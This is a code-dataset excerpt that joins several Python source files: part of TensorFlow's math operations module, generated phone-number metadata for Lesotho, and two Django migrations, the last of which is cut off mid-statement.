Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._max(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_all(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the "logical and" of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[True, True]
# [False, False]]
tf.reduce_all(x) ==> False
tf.reduce_all(x, 0) ==> [False, False]
tf.reduce_all(x, 1) ==> [True, False]
```
Args:
input_tensor: The boolean tensor to reduce.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._all(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_any(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the "logical or" of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[True, True]
# [False, False]]
tf.reduce_any(x) ==> True
tf.reduce_any(x, 0) ==> [True, True]
tf.reduce_any(x, 1) ==> [True, False]
```
Args:
input_tensor: The boolean tensor to reduce.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._any(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_logsumexp(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes log(sum(exp(elements across dimensions of a tensor))).
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
This function is more numerically stable than log(sum(exp(input))). It avoids
overflows caused by taking the exp of large inputs and underflows caused by
taking the log of small inputs.
For example:
```python
# 'x' is [[0, 0, 0]
# [0, 0, 0]]
tf.reduce_logsumexp(x) ==> log(6)
tf.reduce_logsumexp(x, 0) ==> [log(2), log(2), log(2)]
tf.reduce_logsumexp(x, 1) ==> [log(3), log(3)]
tf.reduce_logsumexp(x, 1, keep_dims=True) ==> [[log(3)], [log(3)]]
tf.reduce_logsumexp(x, [0, 1]) ==> log(6)
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the default),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
with ops.name_scope(name, "ReduceLogSumExp", [input_tensor]) as name:
my_max = array_ops.stop_gradient(
reduce_max(input_tensor, reduction_indices, keep_dims=True))
result = gen_math_ops.log(reduce_sum(
gen_math_ops.exp(input_tensor - my_max),
reduction_indices,
keep_dims=True)) + my_max
if not keep_dims:
result = array_ops.squeeze(result, reduction_indices)
return result
def trace(x, name=None):
""" Compute the trace of a tensor `x`.
`trace(x)` returns the sum along the main diagonal of each inner-most matrix
in x. If x is of rank `k` with shape `[I, J, K, ..., L, M, N]`, then output
is a tensor of rank `k-2` with dimensions `[I, J, K, ..., L]` where
`output[i, j, k, ..., l] = trace(x[i, j, k, ..., l, :, :])`
For example:
```python
# 'x' is [[1, 2],
# [3, 4]]
tf.trace(x) ==> 5
# 'x' is [[1,2,3],
# [4,5,6],
# [7,8,9]]
tf.trace(x) ==> 15
# 'x' is [[[1,2,3],
# [4,5,6],
# [7,8,9]],
# [[-1,-2,-3],
# [-4,-5,-6],
# [-7,-8,-9]]]
tf.trace(x) ==> [15,-15]
```
Args:
x: tensor.
name: A name for the operation (optional).
Returns:
The trace of input tensor.
"""
with ops.name_scope(name, "Trace", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return reduce_sum(array_ops.matrix_diag_part(x), [-1], name=name)
def matmul(a, b,
transpose_a=False, transpose_b=False,
a_is_sparse=False, b_is_sparse=False,
name=None):
"""Multiplies matrix `a` by matrix `b`, producing `a` * `b`.
The inputs must be two-dimensional matrices, with matching inner dimensions,
possibly after transposition.
Both matrices must be of the same type. The supported types are:
`float32`, `float64`, `int32`, `complex64`.
Either matrix can be transposed on the fly by setting the corresponding flag
to `True`. This is `False` by default.
If one or both of the matrices contain a lot of zeros, a more efficient
multiplication algorithm can be used by setting the corresponding
`a_is_sparse` or `b_is_sparse` flag to `True`. These are `False` by default.
For example:
```python
# 2-D tensor `a`
a = tf.constant([1, 2, 3, 4, 5, 6], shape=[2, 3]) => [[1. 2. 3.]
[4. 5. 6.]]
# 2-D tensor `b`
b = tf.constant([7, 8, 9, 10, 11, 12], shape=[3, 2]) => [[7. 8.]
[9. 10.]
[11. 12.]]
c = tf.matmul(a, b) => [[58 64]
[139 154]]
```
Args:
a: `Tensor` of type `float32`, `float64`, `int32` or `complex64`.
b: `Tensor` with same type as `a`.
transpose_a: If `True`, `a` is transposed before multiplication.
transpose_b: If `True`, `b` is transposed before multiplication.
a_is_sparse: If `True`, `a` is treated as a sparse matrix.
b_is_sparse: If `True`, `b` is treated as a sparse matrix.
name: Name for the operation (optional).
Returns:
A `Tensor` of the same type as `a`.
"""
with ops.name_scope(name, "MatMul", [a, b]) as name:
a = ops.convert_to_tensor(a, name="a")
b = ops.convert_to_tensor(b, name="b")
sparse_matmul_types = [dtypes.bfloat16, dtypes.float32]
use_sparse_matmul = (a.dtype in sparse_matmul_types and
b.dtype in sparse_matmul_types and
(a_is_sparse or b_is_sparse))
if dtypes.bfloat16 in (a.dtype, b.dtype):
# matmul currently doesn't handle bfloat16 inputs.
use_sparse_matmul = True
if use_sparse_matmul:
return sparse_matmul(a, b,
transpose_a=transpose_a,
transpose_b=transpose_b,
a_is_sparse=a_is_sparse,
b_is_sparse=b_is_sparse,
name=name)
else:
return gen_math_ops._mat_mul(a, b,
transpose_a=transpose_a,
transpose_b=transpose_b,
name=name)
sparse_matmul = gen_math_ops._sparse_mat_mul
batch_matmul = gen_math_ops._batch_mat_mul
ops.RegisterShape("MatMul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseMatMul")(common_shapes.call_cpp_shape_fn)
@ops.RegisterStatistics("MatMul", "flops")
def _calc_mat_mul_flops(graph, node):
"""Calculates the compute resources needed for MatMul."""
transpose_a = node.attr["transpose_a"].b
a_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
a_shape.assert_is_fully_defined()
if transpose_a:
k = int(a_shape[0])
else:
k = int(a_shape[1])
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
output_count = np.prod(output_shape.as_list())
return ops.OpStats("flops", (k * output_count * 2))
@ops.RegisterStatistics("MatMul", "weight_parameters")
def _calc_mat_mul_weight_parameters(graph, node):
"""Calculates the on-disk size of the weights for MatMul."""
# We assume here that the weights are always in the second input to the op,
# which is generally true by convention for fully-connected layers, but not
# enforced or checked.
weights_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
weights_shape.assert_is_fully_defined()
return ops.OpStats("weight_parameters",
(int(weights_shape[1]) * int(weights_shape[0])))
def _as_indexed_slices(x, optimize=True):
"""Convert 'x' to IndexedSlices.
Convert a dense Tensor to a block-sparse IndexedSlices.
Args:
x: Either a Tensor object, or an IndexedSlices object.
optimize: if true, attempt to optimize the conversion of 'x'.
Returns:
An IndexedSlices object.
Raises:
TypeError: If 'x' is not a Tensor or an IndexedSlices object.
"""
# TODO(touts): op_scope
if not isinstance(x, (ops.Tensor, ops.IndexedSlices)):
raise TypeError("Not a Tensor or IndexedSlices: %s" % type(x))
if isinstance(x, ops.IndexedSlices):
return x
x_shape = array_ops.shape_internal(x, optimize=optimize)
return ops.IndexedSlices(x, range(0, x_shape[0]), x_shape)
def _as_indexed_slices_list(inputs, optimize=True):
"""Convert all elements of 'inputs' to IndexedSlices.
Additionally, homogenize the types of all the indices to
either int32 or int64.
Args:
inputs: List containing either Tensor or IndexedSlices objects.
optimize: if true, attempt to optimize the conversion of each input.
Returns:
A list of IndexedSlices objects.
Raises:
TypeError: If 'inputs' is not a list or a tuple.
"""
if not isinstance(inputs, (list, tuple)):
raise TypeError("Expected a list or tuple, not a %s" % type(inputs))
outputs = [_as_indexed_slices(i, optimize=optimize) for i in inputs]
with_int32_index = [o.indices for o in outputs
if o.indices.dtype == dtypes.int32]
if not with_int32_index or len(with_int32_index) == len(outputs):
return outputs
casted_outputs = []
for o in outputs:
if o.indices.dtype == dtypes.int32:
casted_outputs.append(
ops.IndexedSlices(o.values, cast(o.indices, dtypes.int64),
o.dense_shape))
else:
casted_outputs.append(o)
return casted_outputs
def add_n(inputs, name=None):
"""Adds all input tensors element-wise.
Args:
inputs: A list of `Tensor` objects, each with same shape and type.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as the elements of `inputs`.
Raises:
ValueError: If `inputs` don't all have same shape and dtype or the shape
cannot be inferred.
"""
if not inputs or not isinstance(inputs, (list, tuple)):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
if not all(isinstance(x, ops.Tensor) for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
if len(inputs) == 1:
if name:
return array_ops.identity(inputs[0], name=name)
return inputs[0]
return gen_math_ops._add_n(inputs, name=name)
def accumulate_n(inputs, shape=None, tensor_dtype=None, name=None):
"""Returns the element-wise sum of a list of tensors.
Optionally, pass `shape` and `tensor_dtype` for shape and type checking,
otherwise, these are inferred.
NOTE: This operation is not differentiable and cannot be used if inputs depend
on trainable variables. Please use `tf.add_n` for such cases.
For example:
```python
# tensor 'a' is [[1, 2], [3, 4]]
# tensor `b` is [[5, 0], [0, 6]]
tf.accumulate_n([a, b, a]) ==> [[7, 4], [6, 14]]
# Explicitly pass shape and type
tf.accumulate_n([a, b, a], shape=[2, 2], tensor_dtype=tf.int32)
==> [[7, 4], [6, 14]]
```
Args:
inputs: A list of `Tensor` objects, each with same shape and type.
shape: Shape of elements of `inputs`.
tensor_dtype: The type of `inputs`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as the elements of `inputs`.
Raises:
ValueError: If `inputs` don't all have same shape and dtype or the shape
cannot be inferred.
"""
if not inputs or not isinstance(inputs, (list, tuple)):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
if not all(isinstance(x, ops.Tensor) for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
if not all(x.dtype == inputs[0].dtype for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
if shape is not None:
shape = tensor_shape.as_shape(shape)
else:
shape = tensor_shape.unknown_shape()
for input_tensor in inputs:
if isinstance(input_tensor, ops.Tensor):
shape = shape.merge_with(input_tensor.get_shape())
if len(inputs) == 1:
return inputs[0]
if tensor_dtype is None:
tensor_dtype = inputs[0].dtype
with ops.name_scope(name, "AccumulateN", inputs) as name:
var = gen_state_ops._temporary_variable(shape=tensor_shape.vector(0),
dtype=tensor_dtype)
with ops.colocate_with(var):
zeros = array_ops.zeros_like(gen_control_flow_ops._merge(inputs)[0])
zeros.set_shape(shape)
ref = state_ops.assign(var, zeros, validate_shape=False)
update_ops = [state_ops.assign_add(ref, input_tensor, use_locking=True)
for input_tensor in inputs]
with ops.control_dependencies(update_ops):
return gen_state_ops._destroy_temporary_variable(
ref, var_name=var.op.name, name=name)
ops.RegisterShape("BatchMatMul")(common_shapes.call_cpp_shape_fn)
def sigmoid(x, name=None):
"""Computes sigmoid of `x` element-wise.
Specifically, `y = 1 / (1 + exp(-x))`.
Args:
x: A Tensor with type `float32`, `float64`, `int32`, `complex64`, `int64`,
or `qint32`.
name: A name for the operation (optional).
Returns:
A Tensor with the same type as `x` if `x.dtype != qint32`
otherwise the return type is `quint8`.
"""
with ops.name_scope(name, "Sigmoid", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops._sigmoid(x, name=name)
def tanh(x, name=None):
"""Computes hyperbolic tangent of `x` element-wise.
Args:
x: A Tensor or SparseTensor with type `float`, `double`, `int32`,
`complex64`, `int64`, or `qint32`.
name: A name for the operation (optional).
Returns:
A Tensor or SparseTensor respectively with the same type as `x` if
`x.dtype != qint32` otherwise the return type is `quint8`.
"""
with ops.name_scope(name, "Tanh", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_tanh = gen_math_ops._tanh(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_tanh, shape=x.shape)
else:
return gen_math_ops._tanh(x, name=name)
def cumsum(x, axis=0, exclusive=False, reverse=False, name=None):
"""Compute the cumulative sum of the tensor `x` along `axis`.
By default, this op performs an inclusive cumsum, which means that the first
element of the input is identical to the first element of the output:
```prettyprint
tf.cumsum([a, b, c]) ==> [a, a + b, a + b + c]
```
By setting the `exclusive` kwarg to `True`, an exclusive cumsum is performed
instead:
```prettyprint
tf.cumsum([a, b, c], exclusive=True) ==> [0, a, a + b]
```
By setting the `reverse` kwarg to `True`, the cumsum is performed in the
opposite direction:
```prettyprint
tf.cumsum([a, b, c], reverse=True) ==> [a + b + c, b + c, c]
```
This is more efficient than using separate `tf.reverse` ops.
The `reverse` and `exclusive` kwargs can also be combined:
```prettyprint
tf.cumsum([a, b, c], exclusive=True, reverse=True) ==> [b + c, c, 0]
```
Args:
x: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int64`, `int32`, `uint8`, `uint16`, `int16`, `int8`, `complex64`,
`complex128`, `qint8`, `quint8`, `qint32`, `half`.
axis: A `Tensor` of type `int32` (default: 0).
exclusive: If `True`, perform an exclusive cumsum (default: False).
reverse: A `bool` (default: False).
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
with ops.name_scope(name, "Cumsum", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops.cumsum(
x, axis, exclusive=exclusive, reverse=reverse, name=name)
def cumprod(x, axis=0, exclusive=False, reverse=False, name=None):
"""Compute the cumulative product of the tensor `x` along `axis`.
By default, this op performs an inclusive cumprod, which means that the first
element of the input is identical to the first element of the output:
```prettyprint
tf.cumprod([a, b, c]) ==> [a, a * b, a * b * c]
```
By setting the `exclusive` kwarg to `True`, an exclusive cumprod is performed
instead:
```prettyprint
tf.cumprod([a, b, c], exclusive=True) ==> [1, a, a * b]
```
By setting the `reverse` kwarg to `True`, the cumprod is performed in the
opposite direction:
```prettyprint
tf.cumprod([a, b, c], reverse=True) ==> [a * b * c, b * c, c]
```
This is more efficient than using separate `tf.reverse` ops.
The `reverse` and `exclusive` kwargs can also be combined:
```prettyprint
tf.cumprod([a, b, c], exclusive=True, reverse=True) ==> [b * c, c, 1]
```
Args:
x: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int64`, `int32`, `uint8`, `uint16`, `int16`, `int8`, `complex64`,
`complex128`, `qint8`, `quint8`, `qint32`, `half`.
axis: A `Tensor` of type `int32` (default: 0).
exclusive: If `True`, perform an exclusive cumprod (default: False).
reverse: A `bool` (default: False).
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
with ops.name_scope(name, "Cumprod", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops.cumprod(
x, axis, exclusive=exclusive, reverse=reverse, name=name)
def conj(x, name=None):
r"""Returns the complex conjugate of a complex number.
Given a tensor `input` of complex numbers, this operation returns a tensor of
complex numbers that are the complex conjugate of each element in `input`. The
complex numbers in `input` must be of the form \\(a + bj\\), where *a* is the
real part and *b* is the imaginary part.
The complex conjugate returned by this operation is of the form \\(a - bj\\).
For example:
# tensor 'input' is [-2.25 + 4.75j, 3.25 + 5.75j]
tf.conj(input) ==> [-2.25 - 4.75j, 3.25 - 5.75j]
If `x` is real, it is returned unchanged.
Args:
x: `Tensor` to conjugate. Must have numeric type.
name: A name for the operation (optional).
Returns:
A `Tensor` that is the conjugate of `x` (with the same type).
Raises:
TypeError: If `x` is not a numeric tensor.
"""
with ops.name_scope(name, "Conj", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
if x.dtype.is_complex:
return gen_math_ops._conj(x, name=name)
elif x.dtype.is_floating or x.dtype.is_integer:
return x
else:
raise TypeError("Expected numeric tensor, got dtype %r" % x.dtype)
ops.RegisterShape("Abs")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Acos")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Asin")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Atan")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Ceil")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Conj")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cos")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cross")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Exp")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Floor")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Imag")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Inv")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IsFinite")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IsInf")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IsNan")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Log")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LogicalNot")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Neg")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Real")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Rsqrt")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sign")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sin")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sqrt")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Square")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sigmoid")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Tanh")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Tan")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Lgamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Digamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Erf")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Erfc")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cast")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("ComplexAbs")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FFT")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IFFT")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FFT2D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IFFT2D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FFT3D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IFFT3D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("TanhGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SigmoidGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("InvGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SqrtGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("RsqrtGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cumsum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cumprod")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Add")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Complex")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Div")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Equal")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Greater")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("GreaterEqual")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Igamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Igammac")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Zeta")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Polygamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Less")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LessEqual")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LogicalAnd")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LogicalOr")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Maximum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Minimum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Mod")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FloorMod")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FloorDiv")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Mul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("NotEqual")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Pow")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sub")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SquaredDifference")(common_shapes.call_cpp_shape_fn)
def _BroadcastShape(op):
"""Common shape function for binary operators that broadcast their inputs."""
return [common_shapes.broadcast_shape(
op.inputs[0].get_shape(),
op.inputs[1].get_shape())]
ops.RegisterShape("Betainc")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseDenseCwiseMul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseDenseCwiseDiv")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseDenseCwiseAdd")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("AddN")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Select")(common_shapes.call_cpp_shape_fn)
@ops.RegisterShape("ArgMax")
@ops.RegisterShape("ArgMin")
def _ArgOpShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[1])
@ops.RegisterShape("All")
@ops.RegisterShape("Any")
@ops.RegisterShape("Max")
@ops.RegisterShape("Mean")
@ops.RegisterShape("Min")
@ops.RegisterShape("Prod")
@ops.RegisterShape("Sum")
def _ReductionShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[1])
ops.RegisterShape("SegmentMax")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentMean")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentMin")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentProd")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentSum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseSegmentMean")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseSegmentSqrtN")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseSegmentSum")(common_shapes.call_cpp_shape_fn)
@ops.RegisterShape("SparseSegmentMeanGrad")
@ops.RegisterShape("SparseSegmentSqrtNGrad")
# pylint: disable=invalid-name
def _SparseSegmentReductionGradShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[3])
# pylint: enable=invalid-name
@ops.RegisterShape("UnsortedSegmentSum")
def _UnsortedSegmentSumShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[2])
@ops.RegisterShape("LinSpace")
def _LinspaceShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[2])
def reduced_shape(input_shape, axes):
"""Helper function for reduction ops.
Args:
input_shape: 1-D Tensor, the shape of the Tensor being reduced.
axes: 1-D Tensor, the reduction axes.
Returns:
A 1-D Tensor, the output shape as if keep_dims were set to True.
"""
# Example:
# cast needed for SparseTensor reductions
input_shape = to_int32(input_shape) # [2, 3, 5, 7]
axes = to_int32(axes) # [1, 2]
input_rank = array_ops.size(input_shape) # 4
axes = (axes + input_rank) % input_rank
axes_shape = array_ops.shape(axes) # [2]
return gen_data_flow_ops.dynamic_stitch( # [2, 1, 1, 7]
[range(input_rank), # [0, 1, 2, 3]
axes], # [1, 2]
[input_shape, # [2, 3, 5, 7]
array_ops.fill(axes_shape, 1)]) # [1, 1]
ops.RegisterShape("QuantizedMatMul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Requantize")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("RequantizationRange")(common_shapes.call_cpp_shape_fn)
|
py | 1a34649f729795b6f504bc96bdffca365513aa47 | """Auto-generated file, do not edit by hand. LS metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_LS = PhoneMetadata(id='LS', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='1\\d\\d', possible_length=(3,)),
toll_free=PhoneNumberDesc(national_number_pattern='11[257]', example_number='112', possible_length=(3,)),
emergency=PhoneNumberDesc(national_number_pattern='11[257]', example_number='112', possible_length=(3,)),
short_code=PhoneNumberDesc(national_number_pattern='11[257]', example_number='112', possible_length=(3,)),
short_data=True)
|
py | 1a34654aaf5bdb9118b16aca61378813cdffb2e5 | # Generated by Django 2.0.9 on 2018-10-30 17:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('knigi', '0002_auto_20181030_0907'),
]
operations = [
migrations.RemoveField(
model_name='book',
name='sold_at',
),
migrations.RemoveField(
model_name='inventory',
name='in_stock',
),
migrations.AddField(
model_name='inventory',
name='stock',
field=models.PositiveIntegerField(blank=True, default=0),
),
migrations.AddField(
model_name='store',
name='books',
field=models.ManyToManyField(blank=True, through='knigi.Inventory', to='knigi.Book'),
),
migrations.AlterField(
model_name='inventory',
name='sold',
field=models.PositiveIntegerField(blank=True, default=0),
),
]
|
py | 1a3465e02c795478547e826be2e5d779fb1091e9 | from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('dcim', '0111_component_template_description'),
]
operations = [
# Set max_length=64 for all name fields
migrations.AlterField(
model_name='consoleport',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='consoleporttemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='consoleserverport',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='consoleserverporttemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='devicebay',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='devicebaytemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='inventoryitem',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='poweroutlet',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='poweroutlettemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='powerport',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='powerporttemplate',
name='name',
field=models.CharField(max_length=64),
),
# Update related_name for necessary component and component template models
migrations.AlterField(
model_name='consoleporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consoleporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='consoleserverporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consoleserverporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='devicebay',
name='device',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='devicebays', to='dcim.Device'),
),
migrations.AlterField(
model_name='devicebaytemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='devicebaytemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='frontporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='frontporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='interfacetemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interfacetemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='inventoryitem',
name='device',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inventoryitems', to='dcim.Device'),
),
migrations.AlterField(
model_name='poweroutlettemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='poweroutlettemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='powerporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='powerporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='rearporttemplate',
name='device_type',
